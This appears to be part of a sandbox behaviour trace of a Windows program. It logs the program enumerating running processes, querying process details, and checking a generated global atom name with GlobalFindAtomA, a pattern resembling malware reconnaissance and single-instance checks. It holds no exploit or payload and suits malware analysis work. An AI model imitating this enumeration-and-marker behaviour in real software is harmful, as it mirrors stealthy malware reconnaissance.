	[0132.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.774] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.775] CloseHandle (hObject=0x2dc) returned 1
	[0132.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0132.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0132.775] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.775] CloseHandle (hObject=0x2dc) returned 1
	[0132.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0132.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.776] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.776] CloseHandle (hObject=0x2dc) returned 1
	[0132.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0132.776] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.776] CloseHandle (hObject=0x2dc) returned 1
	[0132.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0132.777] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.777] CloseHandle (hObject=0x2dc) returned 1
	[0132.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0132.777] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.777] CloseHandle (hObject=0x2dc) returned 1
	[0132.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0132.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.778] CloseHandle (hObject=0x2dc) returned 1
	[0132.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0132.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.778] CloseHandle (hObject=0x2dc) returned 1
	[0132.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.779] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.779] CloseHandle (hObject=0x2dc) returned 1
	[0132.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0132.779] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.779] CloseHandle (hObject=0x2dc) returned 1
	[0132.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.780] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.780] CloseHandle (hObject=0x2dc) returned 1
	[0132.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0132.780] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.780] CloseHandle (hObject=0x2dc) returned 1
	[0132.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0132.780] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.780] CloseHandle (hObject=0x2dc) returned 1
	[0132.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0132.781] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.781] CloseHandle (hObject=0x2dc) returned 1
	[0132.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0132.781] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.781] CloseHandle (hObject=0x2dc) returned 1
	[0132.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0132.782] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.782] CloseHandle (hObject=0x2dc) returned 1
	[0132.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0132.782] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.782] CloseHandle (hObject=0x2dc) returned 1
	[0132.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.783] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.783] CloseHandle (hObject=0x2dc) returned 1
	[0132.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0132.783] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.783] CloseHandle (hObject=0x2dc) returned 1
	[0132.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0132.783] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.783] CloseHandle (hObject=0x2dc) returned 1
	[0132.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0132.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.784] CloseHandle (hObject=0x2dc) returned 1
	[0132.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0132.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.784] CloseHandle (hObject=0x2dc) returned 1
	[0132.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0132.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.785] CloseHandle (hObject=0x2dc) returned 1
	[0132.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0132.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.785] CloseHandle (hObject=0x2dc) returned 1
	[0132.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0132.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.785] CloseHandle (hObject=0x2dc) returned 1
	[0132.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0132.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.786] CloseHandle (hObject=0x2dc) returned 1
	[0132.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0132.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.786] CloseHandle (hObject=0x2dc) returned 1
	[0132.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0132.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.787] CloseHandle (hObject=0x2dc) returned 1
	[0132.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0132.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.787] CloseHandle (hObject=0x2dc) returned 1
	[0132.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0132.788] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.788] CloseHandle (hObject=0x2dc) returned 1
	[0132.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.788] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetLastError () returned 0x5
	[0132.789] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.790] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.790] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.790] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.791] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetLastError () returned 0x5
	[0132.792] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.792] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.792] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.793] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.793] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.793] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.793] CloseHandle (hObject=0x2dc) returned 1
	[0132.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0132.793] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.793] CloseHandle (hObject=0x2dc) returned 1
	[0132.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0132.794] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.794] CloseHandle (hObject=0x2dc) returned 1
	[0132.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0132.794] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.794] CloseHandle (hObject=0x2dc) returned 1
	[0132.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.794] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.795] CloseHandle (hObject=0x2dc) returned 1
	[0132.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0132.795] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.795] CloseHandle (hObject=0x2dc) returned 1
	[0132.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0132.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16cd8) returned 0xc0000004
	[0132.826] VirtualAlloc (lpAddress=0x0, dwSize=0x16dd8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0132.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16dd8, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0132.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0132.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
